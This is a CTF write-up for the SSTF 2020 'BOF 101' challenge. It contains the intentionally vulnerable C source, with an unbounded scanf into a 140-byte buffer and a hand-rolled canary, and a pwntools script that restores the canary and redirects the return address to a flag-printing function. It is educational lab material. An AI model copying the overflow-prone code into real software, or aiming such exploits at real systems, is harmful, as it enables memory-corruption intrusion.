[SSTF 2020] BOF 101 Writeup

Analysis

checksec

bof101.c

#include <stdio.h>
//#include <fcntl.h>
//#include <unistd.h>
#include <stdlib.h>
#include <string.h>

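/*
 * Read the first 32 bytes of /flag into a stack buffer and print them.
 * Nothing in main() calls this; main() only leaks its address so the
 * solver can overwrite main()'s saved return address with it.
 *
 * Two defects in the challenge source are fixed here without changing the
 * interface: fopen() was never checked (a missing /flag dereferenced NULL
 * in fread), and fread() filled all 32 bytes of a 32-byte buffer with no
 * terminator, so printf("%s") could read past the end of buf.
 */
void printflag(){ 
	char buf[33];			/* 32 data bytes + NUL terminator */
	FILE* fp = fopen("/flag", "r"); 
	if (fp == NULL) {
		perror("/flag");
		return;
	}
	/* fread() does not terminate the buffer; use its byte count to do so */
	size_t n = fread(buf, 1, 32, fp);
	fclose(fp);
	buf[n] = '\0';
	printf("%s", buf);
	fflush(stdout);
}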

/*
 * Challenge entry point.
 *
 * 1. Leaks printflag()'s runtime address so the solver does not need to
 *    defeat PIE on their own.
 * 2. Reads the "name" with scanf("%s"), which has no length limit -- this
 *    is the stack buffer overflow the challenge is built around.
 * 3. `check` acts as a hand-rolled stack canary: if the overflow changed
 *    it, the program exits before returning. The exploit gets past this
 *    by writing 0xdeadbeef back into it rather than avoiding it.
 *
 * The exploit on this page pads 0x8c (= 140 = sizeof name) bytes before
 * the check value, then 8 bytes for the saved rbp, then the return
 * address, i.e. check is laid out directly after name[] in this build;
 * that ordering comes from the compiled binary, not from C semantics.
 */
int main() {
	int check=0xdeadbeef;	/* overwritten by any overflow that does not restore it */
	char name[140];
	printf("printflag()'s addr: %p\n", &printflag);	/* the leak the exploit parses */
	printf("What is your name?\n: ");
	fflush(stdout);
	scanf("%s", name);	/* unbounded write into name[140]: the BOF */
	if (check != 0xdeadbeef){
		printf("[Warning!] BOF detected!\n");
		fflush(stdout);
		exit(0);	/* never reached when check is rewritten with 0xdeadbeef */
	}
	return 0;	/* the ret here pops the overwritten return address -> printflag */
}

Disassemble

scanf("%s")는 길이 제한 없이 name[140]에 입력을 쓰므로 BOF가 가능하다.

또한, BOF를 감지하는 변수인 check를 원래 값인 0xdeadbeef로 다시 덮어서 우회해주고 ret를 printflag의 주소로 덮어주면 간단하게 풀릴 것이다. 디스어셈블 결과 name[140] 바로 뒤에 check가 있으므로, 패딩 0x8c(=140)바이트, check 4바이트, SFP 8바이트, ret 순서로 페이로드를 구성하면 된다.

Exploit

exploit.py

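from pwn import *

p = remote("bof101.sstf.site", 1337)

# The binary prints printflag()'s address before the prompt. Take the whole
# line instead of a fixed recv(14): recv() may return short on a fragmented
# read, and a fixed width also breaks if the address has fewer hex digits.
p.recvuntil(b"printflag()'s addr: ")
leak = int(p.recvline().strip(), 16)
log.info("printflag @ %#x", leak)

# Stack layout taken from the disassembly (not reproduced on this page):
# name[140] is followed directly by the 4-byte check, then the saved rbp
# (8 bytes), then the return address. The payload must be bytes end to end:
# str + p32() raises TypeError on Python 3, so the original str()-based
# version only ran on Python 2.
payload  = b"A" * (0x90 - 0x4)   # 0x8c = 140 bytes: fill name[] up to check
payload += p32(0xDEADBEEF)       # restore check so the BOF branch / exit(0) is skipped
payload += b"A" * 8              # saved rbp (sfp)
payload += p64(leak)             # return address -> printflag

# scanf("%s") stops at the first whitespace byte. The leaked address could
# in principle contain one (0x09-0x0d, 0x20), which would truncate the
# payload; warn instead of sending a payload that cannot land.
if any(ws in payload for ws in b" \t\n\r\x0b\x0c"):
    log.warning("payload contains whitespace; scanf(\"%s\") will truncate it")

p.sendlineafter(b"What is your name?\n", payload)

# If printflag crashes inside fopen/printf with a 16-byte stack alignment
# fault (movaps), prepend a `ret` gadget before `leak` to fix rsp alignment.
p.interactive()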
